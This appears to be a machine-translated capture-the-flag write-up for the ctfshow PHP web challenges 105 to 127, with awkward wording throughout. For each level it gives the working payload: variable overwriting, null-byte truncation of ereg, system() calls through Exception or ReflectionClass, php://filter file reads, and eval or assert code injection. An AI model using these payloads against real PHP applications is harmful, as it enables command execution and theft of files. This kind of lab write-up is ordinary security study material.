ctfshow 105-127

Web（105）【foreach function 】

Foreach function PHP: foreach - Manual

?suces=flag   post   error=suces

Web（106）【shal】

?v2[ ]=3

v1[ ]=   Before 104 However, because a condition is added here, different assignments should be used .

Web（107）【Parse_str function 】

Parse_str The function adds a string to an array , Will be v1 Add to array ,

？v3【】=

Post

V1=

because md5 The array cannot be parsed so it is empty , We don't give v1 To the end ,v2 The value of is empty , So air to air is true .

Web（108）【ereg function 】

ereg() The function searches for the specified string in a string with the specified pattern , If the match is successful, return true, otherwise , Then return to false. Searching for alphabetic characters is case sensitive .

strrev() Function to reverse the string .

intval() Function to get the integer value of a variable

The first thing you need to know is %00 Can cut off ereg() Function search , Regular expressions will only match %00 Previous content ;0x36d The decimal content of is 877, We need letters in front of us to meet if Regular matching of conditions to skip if sentence , Then the string is inverted to get 877a, next intval() Function takes the integer part to get 877 therefore payload by

?c=a%00778

Web109【 Reflection class and exception handling class 】

V1 and v2 All letters are required . The final form is generally not good, so we need to use a class to contain functions , The final output .

Exception Processing is used to change the normal flow of a script when a specified error occurs , yes php Built in exception handling class

ReflectionClass perhaps ReflectionMethod Are commonly used reflection classes , It can be understood as the mapping of a class

?v1=Exception&v2=system('tac fl36dg.txt')
perhaps
?v1=ReflectionClass&v2=system('tac fl36dg.txt')
perhaps
?v1=ReflectionMethod&v2=system('tac fl36dg.txt')

Build the exception class and add system The function is followed by the output , The first thing to look at is flag The location of the car can be system（ls） Then it was discovered in fl36dg.txt in . Building a successful .

Web 110【FilesystemIterator iterator 】

utilize FilesystemIterator Get all the files in the specified directory  

 getcwd() function Get the current working directory

 echo new FilesystemIterator(getcwd()); // By default, only the first file is displayed , Need to traverse

?v1=FilesystemIterator&v2=getcwd

After the url From a visit to falg File name .

Web111【$GLOBALS】

This time, the test is still focused on variable coverage ( If you forget something, go over it web105), Preferred needs v1 contain ctfshow In order to be regular , perform getflag function , therefore v1=ctfshow, And then getflag In the function , Will be able to v2 Send the address of to v1, Then output v1, Here we can use php Global variable in GLOBALS

    $GLOBALS — References all variables available in the global scope A global composite array containing all variables . The name of the variable is the key of the array .

therefore payload by

Code

?v1=ctfshow&v2=GLOBALS

Process is $ctfshow=&$GLOBALS( Global variables contain flag The variable of ), And then through var_dump Output $ctfshow

Web112【is_file() function ,filter() function 】

is_file() Function to check whether the specified file name is a normal file

filter() The function is used to access data from non secure sources （ For example, user input ） Verify and filter

Here, first of all, if The statement can only be executed if the file type we need to pass in is not a file type highlight_file Statement to read flag file , That is, a bypass test site , We use php Pseudo protocol is enough , therefore payload by

?file=php://filter/resource=flag.php

Web113【.zlib:】

More filtering filter The last question cannot be used any more , have access to hint The solution in is the same as that in the previous question compress.zlib://flag.php

This prompt is used to solve . Why didn't you find the reason .

Web114【】

take filter Restrictions lifted , Try it and you will get .?file=php://filter/resource=flag.php

Web123【 Variable name 】

I saw a behind eval() The function will execute $c, So we focus on $c and if Judge the two post that will do
stay php Variable names in are only underlined with numbers and letters , By get perhaps post Passed in variable name , If it contains Space 、+、[ It will be transformed into _, So we can't construct CTF_SHOW.COM This variable ( Because it contains .), but php There is a feature in if you pass in [, It is transformed into _ after , The following characters will be preserved and will not be replaced , therefore payload by

post：
CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag

web125

CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag Make changes on the basis of the above question, and then it will flag and echo Filtered , Now we need to combine a read file operation with a flag Pass in ,flag After being filtered, you can create a new file with its turning function

CTF_SHOW=1&CTF[SHOW.COM=1&fun=highlight_file($_GET[1]);

?1=flag.php

web126【$_SERVER['argv'][0]=$_SERVER['QUERY_STRING']】

$_SERVER['argv'][0]=$_SERVER['QUERY_STRING']

query string yes Uniform Resource Locator (URL) Part of , It contains information that needs to be passed on to web application The data of

GET:?$fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0])

Web127【extract】

extract() Function to import variables from an array into the current symbol table , Use the array key name as the variable name , Use array key value as variable value

For example ?a=2, Will become $a=2, here ctf_show There is one _ It needs to be constructed , As I said before php Variable names in are only underlined with numbers and letters , By get perhaps post Passed in variable name , If there are spaces 、+、[ It will be transformed into _, The space here is not ban, So we use spaces ,payload by

?ctf show=ilove36d